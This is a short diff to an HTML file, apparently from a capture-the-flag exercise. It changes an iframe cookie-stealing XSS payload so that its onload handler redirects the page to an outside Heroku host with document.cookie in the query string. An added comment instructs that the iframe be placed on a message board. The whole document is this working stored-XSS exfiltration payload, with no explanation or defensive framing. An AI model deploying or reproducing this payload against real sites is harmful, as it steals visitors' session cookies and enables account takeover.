--- a/test.html
+++ b/test.html
@@ -1,3 +1,4 @@
 <html>
-    <iframe onload="document.location.replace(`http://localhost/?c=`+document.cookie)"></iframe>
+    <!-- Put This iframe on message board -->
+    <iframe onload="document.location.replace(`http://nthuctf.herokuapp.com/?c=`+document.cookie)"></iframe>
 </html>
